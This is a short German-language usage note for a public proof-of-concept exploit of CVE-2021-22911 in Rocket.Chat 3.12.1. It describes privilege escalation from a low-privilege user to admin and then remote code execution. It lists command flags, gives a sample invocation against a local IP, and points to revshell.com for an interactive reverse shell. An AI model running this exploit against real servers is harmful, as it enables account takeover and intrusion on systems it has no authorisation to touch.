
Proof-of-Concept-Exploit für CVE-2021-22911, das auf Rocket.Chat 3.12.1 abzielt. Automatisiert die Privilegieneskalation von einem Benutzer mit niedrigen Rechten zum Administrator und erreicht Remote-Code-Ausführung durch Missbrauch der authentifizierten API.


-u = E-Mail des Benutzers mit niedrigen Rechten [ Kein 2FA ]
-a = Administrator-E-Mail
-t = URL (z. B.: http://rocketchat.local)
python3 rocketchat.py -u [email protected] -a [email protected] -t http://192.168.169.164:3000
Führe mit RCE beliebigen Code aus. (Das Ergebnis der Ausführung wird nicht angezeigt)

revshell.com -> interaktive Shell

Quelle: 50108.py